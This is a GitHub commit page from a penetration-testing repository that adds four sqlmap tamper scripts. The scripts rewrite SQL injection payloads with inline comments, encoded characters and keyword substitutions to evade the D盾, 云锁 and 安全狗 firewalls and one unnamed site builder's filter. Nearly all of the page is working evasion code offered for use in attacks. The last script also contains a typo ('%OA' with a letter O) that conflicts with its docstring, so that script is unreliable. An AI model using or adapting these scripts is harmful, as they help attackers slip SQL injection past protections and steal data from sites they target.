forked from Mr-xn/Penetration_Testing_POC
-
Notifications
You must be signed in to change notification settings - Fork 0
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
add sqlmap bypass D盾/云锁/安全狗/空格替换换行 tamper
- Loading branch information
Showing
5 changed files
with
148 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,34 @@ | ||
# coding=UTF-8 | ||
# Desc: sqlmap_bypass_D盾_tamper | ||
|
||
from lib.core.enums import PRIORITY | ||
__priority__ = PRIORITY.LOW | ||
|
||
|
||
def dependencies(): | ||
pass | ||
|
||
|
||
def tamper(payload, **kwargs): | ||
""" | ||
BYPASS Ddun | ||
""" | ||
retVal = payload | ||
if payload: | ||
retVal = "" | ||
quote, doublequote, firstspace = False, False, False | ||
for i in xrange(len(payload)): | ||
if not firstspace: | ||
if payload[i].isspace(): | ||
firstspace = True | ||
retVal += "/*DJSAWW%2B%26Lt%3B%2B*/" | ||
continue | ||
elif payload[i] == '\'': | ||
quote = not quote | ||
elif payload[i] == '"': | ||
doublequote = not doublequote | ||
elif payload[i] == " " and not doublequote and not quote: | ||
retVal += "/*DJSAWW%2B%26Lt%3B%2B*/" | ||
continue | ||
retVal += payload[i] | ||
return retVal |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
# coding=UTF-8 | ||
# Desc: sqlmap bypass 云锁 tamper | ||
""" | ||
Copyright (c) 2006-2019 sqlmap developers (http://sqlmap.org/) | ||
See the file 'LICENSE' for copying permission | ||
""" | ||
|
||
import re | ||
|
||
from lib.core.data import kb | ||
from lib.core.enums import PRIORITY | ||
from lib.core.common import singleTimeWarnMessage | ||
from lib.core.enums import DBMS | ||
__priority__ = PRIORITY.LOW | ||
|
||
|
||
def dependencies(): | ||
pass | ||
|
||
|
||
def tamper(payload, **kwargs): | ||
payload = payload.replace('ORDER', '/*!00000order*/') | ||
payload = payload.replace('ALL SELECT', '/*!00000all*/ /*!00000select') | ||
payload = payload.replace('CONCAT(', "CONCAT/**/(") | ||
payload = payload.replace("--", " */--") | ||
payload = payload.replace("AND", "%26%26") | ||
return payload |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,24 @@ | ||
# coding=UTF-8 | ||
# Desc: sqlmap_bypass_安全狗_tamper | ||
|
||
from lib.core.enums import PRIORITY | ||
from lib.core.settings import UNICODE_ENCODING | ||
__priority__ = PRIORITY.LOW | ||
def dependencies(): | ||
pass | ||
def tamper(payload, **kwargs): | ||
|
||
if payload: | ||
payload=payload.replace(" ","/*!*/") | ||
payload=payload.replace("=","/*!*/=/*!*/") | ||
payload=payload.replace("AND","/*!*/AND/*!*/") | ||
payload=payload.replace("UNION","union/*!88888cas*/") | ||
payload=payload.replace("#","/*!*/#") | ||
payload=payload.replace("USER()","USER/*!()*/") | ||
payload=payload.replace("DATABASE()","DATABASE/*!()*/") | ||
payload=payload.replace("--","/*!*/--") | ||
payload=payload.replace("SELECT","/*!88888cas*/select") | ||
payload=payload.replace("FROM","/*!99999c*//*!99999c*/from") | ||
print payload | ||
|
||
return payload |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,59 @@ | ||
# coding=UTF-8 | ||
# Desc: sqlmap_bypass_某企业建站程序过滤_tamper | ||
|
||
""" | ||
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) | ||
See the file 'LICENSE' for copying permission | ||
""" | ||
|
||
from lib.core.enums import PRIORITY | ||
|
||
__priority__ = PRIORITY.LOW | ||
|
||
def dependencies(): | ||
pass | ||
|
||
def tamper(payload, **kwargs): | ||
""" | ||
把空格替换成换行符:%0A | ||
Replaces space character (' ') with comments '%0A' | ||
Tested against: | ||
* Microsoft SQL Server 2005 | ||
* MySQL 4, 5.0 and 5.5 | ||
* Oracle 10g | ||
* PostgreSQL 8.3, 8.4, 9.0 | ||
Notes: | ||
* Useful to bypass weak and bespoke web application firewalls | ||
>>> tamper('SELECT id FROM users') | ||
'SELECT%0Aid%0AFROM%0Ausers' | ||
""" | ||
|
||
retVal = payload | ||
|
||
if payload: | ||
retVal = "" | ||
quote, doublequote, firstspace = False, False, False | ||
|
||
for i in xrange(len(payload)): | ||
if not firstspace: | ||
if payload[i].isspace(): | ||
firstspace = True | ||
retVal += "/%OA/" | ||
continue | ||
|
||
elif payload[i] == '\'': | ||
quote = not quote | ||
|
||
elif payload[i] == '"': | ||
doublequote = not doublequote | ||
|
||
elif payload[i] == " " and not doublequote and not quote: | ||
retVal += "/%0A/" | ||
continue | ||
|
||
retVal += payload[i] | ||
|
||
return retVal |